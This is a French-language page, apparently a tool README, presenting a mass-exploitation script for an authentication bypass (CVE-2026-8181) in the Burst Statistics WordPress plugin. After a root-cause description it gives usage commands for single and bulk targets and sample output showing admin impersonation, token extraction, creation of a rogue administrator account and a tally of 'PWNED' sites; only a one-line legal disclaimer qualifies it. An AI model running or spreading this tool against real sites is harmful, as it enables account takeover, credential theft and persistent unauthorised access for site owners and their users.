
CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Contournement de l'authentification pour prise de contrôle du compte administrateur
Burst Statistics | Contournement d'authentification menant à une prise de contrôle du compte administrateur
Burst Statistics 3.4.0 - 3.4.1.1 - Contournement d'authentification menant à la prise de contrôle du compte administrateur
Le plugin Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) pour WordPress est vulnérable à un contournement d'authentification dans les versions 3.4.0 à 3.4.1.1. Cela est dû à une gestion incorrecte des valeurs de retour dans la fonction is_mainwp_authenticated() lors de la validation des mots de passe d'application provenant de l'en-tête Authorization. La fonction appelle wp_authenticate_application_password(null, $username, $password) qui retourne null (et non WP_Error) lorsque l'utilisateur cible n'a aucun mot de passe d'application configuré. Comme le code vérifie uniquement is_wp_error(), il poursuit en appelant wp_set_current_user() — accordant ainsi à l'attaquant les privilèges administrateur complets pour toute la requête.
Le contournement est déclenché lors de plugins_loaded (priorité 9) via has_admin_access() dans le bootstrap du plugin, ce qui signifie que l'usurpation de l'utilisateur se produit avant que l'API REST de WordPress ne distribue une route — permettant d'accéder à tous les points de terminaison WP Core (/wp/v2/users, /wp/v2/users/me, etc.) en tant qu'administrateur.
Cela permet à des attaquants non authentifiés, connaissant un nom d'utilisateur administrateur, d'usurper cet administrateur en fournissant n'importe quel mot de passe aléatoire en Basic Authentication, entraînant une escalade complète des privilèges et une prise de contrôle du compte administrateur.
~ Score CVSS : 9.8 (Critique)
~ Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ Versions concernées : 3.4.0 - 3.4.1.1
~ Version corrigée : 3.4.2
Cible unique :
python3 shadow.py -u https://target.comCible unique avec nom d'utilisateur connu :
python3 shadow.py -u https://target.com -U adminCibles multiples :
python3 shadow.py -f targets.txt -t 20Mode interactif :
python3 shadow.py/burst/v1/mainwp-auth)
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
L'utilisation non autorisée de systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester est illégale.